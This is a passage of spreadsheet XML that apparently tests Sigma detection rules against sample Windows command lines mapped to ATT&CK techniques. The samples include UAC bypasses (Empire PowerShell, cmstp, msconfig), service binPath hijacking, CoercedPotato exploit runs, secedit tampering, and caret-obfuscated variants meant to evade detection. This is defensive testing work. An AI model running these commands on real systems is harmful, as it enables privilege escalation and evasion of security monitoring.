        <v>1</v>
      </c>
      <c r="G431" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H431" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I431" s="41" t="n"/>
      <c r="J431" s="41" t="n"/>
      <c r="K431" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="432" ht="15.75" customHeight="1" s="42">
      <c r="A432" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B432" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C432" s="41" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D432" s="41" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E432" s="41" t="inlineStr">
        <is>
          <t>powershell.exe	-NoP	-NonI	-w	Hidden	-c	$x=$((gp	HKCU:Software\Microsoft\Windows Update).Update)</t>
        </is>
      </c>
      <c r="F432" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G432" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H432" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I432" s="41" t="n"/>
      <c r="J432" s="41" t="n"/>
      <c r="K432" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="433" ht="15.75" customHeight="1" s="42">
      <c r="A433" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B433" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C433" s="41" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D433" s="41" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E433" s="41" t="inlineStr">
        <is>
          <t>powershell.exe "-NoP" "-NonI" "-w" "Hidden" "-c" "$x=$((gp HKCU:Software\Microsoft\Windows Update).Update)"</t>
        </is>
      </c>
      <c r="F433" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G433" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H433" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I433" s="41" t="n"/>
      <c r="J433" s="41" t="n"/>
      <c r="K433" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="434" ht="15.75" customHeight="1" s="42">
      <c r="A434" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B434" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C434" s="41" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D434" s="41" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E434" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -NonI -NoP -w Hidden -c "$x=$((gp 'HKCU:Software\Microsoft\Windows Update').Update)"</t>
        </is>
      </c>
      <c r="F434" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G434" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H434" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I434" s="41" t="n"/>
      <c r="J434" s="41" t="n"/>
      <c r="K434" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="435" ht="15.75" customHeight="1" s="42">
      <c r="A435" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B435" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cleanmgr</t>
        </is>
      </c>
      <c r="C435" s="41" t="inlineStr">
        <is>
          <t>UAC Bypass Using Disk Cleanup</t>
        </is>
      </c>
      <c r="D435" s="41" t="inlineStr">
        <is>
          <t>b697e69c-746f-4a86-9f59-7bfff8eab881</t>
        </is>
      </c>
      <c r="E435" s="41" t="inlineStr">
        <is>
          <t>C:\Windows\system32\cleanmgr.exe /autoclean /d C:</t>
        </is>
      </c>
      <c r="F435" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G435" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H435" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I435" s="41" t="n"/>
      <c r="J435" s="41" t="n"/>
      <c r="K435" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="436" ht="15.75" customHeight="1" s="42">
      <c r="A436" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B436" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cleanmgr</t>
        </is>
      </c>
      <c r="C436" s="41" t="inlineStr">
        <is>
          <t>UAC Bypass Using Disk Cleanup</t>
        </is>
      </c>
      <c r="D436" s="41" t="inlineStr">
        <is>
          <t>b697e69c-746f-4a86-9f59-7bfff8eab881</t>
        </is>
      </c>
      <c r="E436" s="41" t="inlineStr">
        <is>
          <t>C:\Windows\system32\cleanmgr.exe /autoclean /d c:</t>
        </is>
      </c>
      <c r="F436" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G436" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H436" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I436" s="41" t="n"/>
      <c r="J436" s="41" t="n"/>
      <c r="K436" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="437" ht="15.75" customHeight="1" s="42">
      <c r="A437" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B437" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cleanmgr</t>
        </is>
      </c>
      <c r="C437" s="41" t="inlineStr">
        <is>
          <t>UAC Bypass Using Disk Cleanup</t>
        </is>
      </c>
      <c r="D437" s="41" t="inlineStr">
        <is>
          <t>b697e69c-746f-4a86-9f59-7bfff8eab881</t>
        </is>
      </c>
      <c r="E437" s="41" t="inlineStr">
        <is>
          <t>C:\Windows\system32\cleanmgr.exe /autoclean /d C:\</t>
        </is>
      </c>
      <c r="F437" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G437" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H437" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I437" s="41" t="n"/>
      <c r="J437" s="41" t="n"/>
      <c r="K437" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="438" ht="15.75" customHeight="1" s="42">
      <c r="A438" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B438" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C438" s="41" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D438" s="41" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E438" s="41" t="inlineStr">
        <is>
          <t>cmstp.exe "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003_uacbypass.inf"</t>
        </is>
      </c>
      <c r="F438" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G438" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H438" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I438" s="41" t="n"/>
      <c r="J438" s="41" t="n"/>
      <c r="K438" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="439" ht="15.75" customHeight="1" s="42">
      <c r="A439" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B439" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_msconfig_gui</t>
        </is>
      </c>
      <c r="C439" s="41" t="inlineStr">
        <is>
          <t>UAC Bypass Using MSConfig Token Modification - Process</t>
        </is>
      </c>
      <c r="D439" s="41" t="inlineStr">
        <is>
          <t>ad92e3f9-7eb6-460e-96b1-582b0ccbb980</t>
        </is>
      </c>
      <c r="E439" s="41" t="inlineStr">
        <is>
          <t>C:\Windows\system32\msconfig.exe -5</t>
        </is>
      </c>
      <c r="F439" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G439" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H439" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I439" s="41" t="n"/>
      <c r="J439" s="41" t="n"/>
      <c r="K439" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="440" ht="15.75" customHeight="1" s="42">
      <c r="A440" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B440" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_ntfs_reparse_point</t>
        </is>
      </c>
      <c r="C440" s="41" t="inlineStr">
        <is>
          <t>UAC Bypass Using NTFS Reparse Point - Process</t>
        </is>
      </c>
      <c r="D440" s="41" t="inlineStr">
        <is>
          <t>39ed3c80-e6a1-431b-9df3-911ac53d08a7</t>
        </is>
      </c>
      <c r="E440" s="41" t="inlineStr">
        <is>
          <t>C:\Windows\System32\wusa.exe /quiet C:\Users\Public\..\AppData\Local\Temp\update.msu</t>
        </is>
      </c>
      <c r="F440" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G440" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H440" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I440" s="41" t="n"/>
      <c r="J440" s="41" t="n"/>
      <c r="K440" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="441" ht="15.75" customHeight="1" s="42">
      <c r="A441" s="41" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B441" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C441" s="41" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D441" s="41" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E441" s="41" t="inlineStr">
        <is>
          <t>nslookup.exe UWhRCAAAAABAAA""AA</t>
        </is>
      </c>
      <c r="F441" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G441" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H441" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I441" s="41" t="n"/>
      <c r="J441" s="41" t="n"/>
      <c r="K441" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="442" ht="15.75" customHeight="1" s="42">
      <c r="A442" s="41" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B442" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C442" s="41" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D442" s="41" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E442" s="41" t="inlineStr">
        <is>
          <t>sc.exe "config" "binpath"= "C:\Windows\Temp\benign.exe"</t>
        </is>
      </c>
      <c r="F442" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G442" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H442" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I442" s="41" t="n"/>
      <c r="J442" s="41" t="n"/>
      <c r="K442" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="443" ht="15.75" customHeight="1" s="42">
      <c r="A443" s="41" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B443" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C443" s="41" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D443" s="41" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E443" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe c^onfig b^inPath= "C:\Windows\Temp\benign.exe"</t>
        </is>
      </c>
      <c r="F443" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G443" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H443" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I443" s="41" t="n"/>
      <c r="J443" s="41" t="n"/>
      <c r="K443" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="444" ht="15.75" customHeight="1" s="42">
      <c r="A444" s="41" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B444" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C444" s="41" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D444" s="41" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E444" s="41" t="inlineStr">
        <is>
          <t>sc.exe config service_name binPath= "C:\Windows\Temp\benign.exe"</t>
        </is>
      </c>
      <c r="F444" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G444" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H444" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I444" s="41" t="n"/>
      <c r="J444" s="41" t="n"/>
      <c r="K444" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="445" ht="15.75" customHeight="1" s="42">
      <c r="A445" s="41" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B445" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C445" s="41" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D445" s="41" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E445" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[WmiClass]'Win32_Service' | Where-Object {$_.Name -eq 'BenignService'} | Invoke-Method -Name SetSecurityDescriptor -ArgumentList ..."</t>
        </is>
      </c>
      <c r="F445" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G445" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H445" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I445" s="41" t="n"/>
      <c r="J445" s="41" t="n"/>
      <c r="K445" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="446" ht="15.75" customHeight="1" s="42">
      <c r="A446" s="41" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B446" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C446" s="41" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D446" s="41" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E446" s="41" t="inlineStr">
        <is>
          <t>secedit.exe "/configure" "/db" mytemplate.db</t>
        </is>
      </c>
      <c r="F446" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G446" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H446" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I446" s="41" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J446" s="41" t="n"/>
      <c r="K446" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="447" ht="15.75" customHeight="1" s="42">
      <c r="A447" s="41" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B447" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C447" s="41" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D447" s="41" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E447" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c secedit.exe /conf^igure /db mytemplate.db</t>
        </is>
      </c>
      <c r="F447" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G447" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H447" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I447" s="41" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J447" s="41" t="n"/>
      <c r="K447" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="448" ht="15.75" customHeight="1" s="42">
      <c r="A448" s="41" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B448" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C448" s="41" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D448" s="41" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E448" s="41" t="inlineStr">
        <is>
          <t>secedit.exe /EXPORT /AREAS SECURITYPOLICY /CFG output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F448" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G448" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H448" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I448" s="41" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J448" s="41" t="n"/>
      <c r="K448" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="449" ht="15.75" customHeight="1" s="42">
      <c r="A449" s="41" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B449" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_coercedpotato</t>
        </is>
      </c>
      <c r="C449" s="41" t="inlineStr">
        <is>
          <t>HackTool - CoercedPotato Execution</t>
        </is>
      </c>
      <c r="D449" s="41" t="inlineStr">
        <is>
          <t>e8d34729-86a4-4140-adfd-0a29c2106307</t>
        </is>
      </c>
      <c r="E449" s="41" t="inlineStr">
        <is>
          <t>CoercedPotato.exe "--exploitId" 1</t>
        </is>
      </c>
      <c r="F449" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G449" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H449" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I449" s="41" t="n"/>
      <c r="J449" s="41" t="n"/>
      <c r="K449" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="450" ht="15.75" customHeight="1" s="42">
      <c r="A450" s="41" t="inlineStr">
        <is>
          <t>t1055</t>
        </is>
      </c>
      <c r="B450" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_coercedpotato</t>
        </is>
      </c>
      <c r="C450" s="41" t="inlineStr">
        <is>
          <t>HackTool - CoercedPotato Execution</t>
        </is>
      </c>
      <c r="D450" s="41" t="inlineStr">
        <is>
          <t>e8d34729-86a4-4140-adfd-0a29c2106307</t>
        </is>
      </c>
      <c r="E450" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c CoercedPotato.exe --exploitId^  1</t>
        </is>
      </c>
      <c r="F450" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G450" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H450" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I450" s="41" t="n"/>
      <c r="J450" s="41" t="n"/>
      <c r="K450" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="451" ht="15.75" customHeight="1" s="42">
      <c r="A451" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B451" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C451" s="41" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D451" s="41" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E451" s="41" t="inlineStr">
        <is>
          <t>cmstp.exe "/s" "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003.inf"</t>
        </is>
      </c>
      <c r="F451" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G451" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H451" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I451" s="41" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP (e66779cc-383e-4224-a3a4-267eeb585c40)</t>
        </is>
      </c>
      <c r="J451" s="41" t="n"/>
      <c r="K451" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="452" ht="15.75" customHeight="1" s="42">
      <c r="A452" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B452" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C452" s="41" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D452" s="41" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E452" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c cmstp.exe /^s "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003.inf"</t>
        </is>
      </c>
      <c r="F452" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G452" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H452" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I452" s="41" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP (e66779cc-383e-4224-a3a4-267eeb585c40)</t>
        </is>
      </c>
      <c r="J452" s="41" t="n"/>
      <c r="K452" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="453" ht="15.75" customHeight="1" s="42">
      <c r="A453" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B453" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_msconfig_gui</t>
        </is>
      </c>
      <c r="C453" s="41" t="inlineStr">
        <is>
          <t>UAC Bypass Using MSConfig Token Modification - Process</t>
        </is>
      </c>
      <c r="D453" s="41" t="inlineStr">
        <is>
          <t>ad92e3f9-7eb6-460e-96b1-582b0ccbb980</t>
        </is>
      </c>
      <c r="E453" s="41" t="inlineStr">
        <is>
          <t>"C:\Windows\system32\msconfig.exe"    -5</t>
        </is>
      </c>
      <c r="F453" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G453" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H453" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I453" s="41" t="n"/>
      <c r="J453" s="41" t="n"/>
      <c r="K453" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="454" ht="15.75" customHeight="1" s="42">
      <c r="A454" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B454" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_msconfig_gui</t>
        </is>
      </c>
      <c r="C454" s="41" t="inlineStr">
        <is>
          <t>UAC Bypass Using MSConfig Token Modification - Process</t>
        </is>
      </c>
      <c r="D454" s="41" t="inlineStr">
        <is>
          <t>ad92e3f9-7eb6-460e-96b1-582b0ccbb980</t>
        </is>
      </c>
      <c r="E454" s="41" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\msconfig.exe" /5</t>
        </is>
      </c>
      <c r="F454" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G454" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H454" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I454" s="41" t="n"/>
      <c r="J454" s="41" t="n"/>
      <c r="K454" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="455" ht="15.75" customHeight="1" s="42">
      <c r="A455" s="41" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B455" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_ntfs_reparse_point</t>
        </is>
      </c>
      <c r="C455" s="41" t="inlineStr">
        <is>
          <t>UAC Bypass Using NTFS Reparse Point - Process</t>
        </is>
      </c>
      <c r="D455" s="41" t="inlineStr">
        <is>
          <t>39ed3c80-e6a1-431b-9df3-911ac53d08a7</t>
        </is>
      </c>
      <c r="E455" s="41" t="inlineStr">
        <is>
          <t>"C:\Windows\system32\wusa.exe"   /quiet "C:\Users\Public\AppData\Local\Temp\update.msu"</t>
        </is>
      </c>
      <c r="F455" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G455" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H455" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I455" s="41" t="n"/>
      <c r="J455" s="41" t="n"/>
      <c r="K455" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="456" ht="15.75" customHeight="1" s="42">
      <c r="A456" s="41" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B456" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C456" s="41" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D456" s="41" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E456" s="41" t="inlineStr">
        <is>
          <t>wsudo -u=System</t>
        </is>
      </c>
      <c r="F456" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G456" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H456" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I456" s="41" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J456" s="41" t="n"/>
      <c r="K456" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="457" ht="15.75" customHeight="1" s="42">
      <c r="A457" s="41" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B457" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C457" s="41" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D457" s="41" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E457" s="41" t="inlineStr">
        <is>
          <t>wsudo --user System</t>
        </is>
      </c>
      <c r="F457" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G457" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H457" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I457" s="41" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J457" s="41" t="n"/>
      <c r="K457" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="458" ht="15.75" customHeight="1" s="42">
      <c r="A458" s="41" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B458" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
        </is>
      </c>
      <c r="C458" s="41" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution</t>
        </is>
      </c>
      <c r="D458" s="41" t="inlineStr">
        <is>
          <t>bdeeabc9-ff2a-4a51-be59-bb253aac7891</t>
        </is>
      </c>
      <c r="E458" s="41" t="inlineStr">
        <is>
          <t>wsudo  -u	System</t>
        </is>
      </c>
      <c r="F458" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G458" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H458" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I458" s="41" t="inlineStr">
        <is>
          <t>PUA - Wsudo Suspicious Execution (bdeeabc9-ff2a-4a51-be59-bb253aac7891); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J458" s="41" t="n"/>
      <c r="K458" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="459" ht="15.75" customHeight="1" s="42">
      <c r="A459" s="41" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B459" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_wsudo_susp_execution</t>
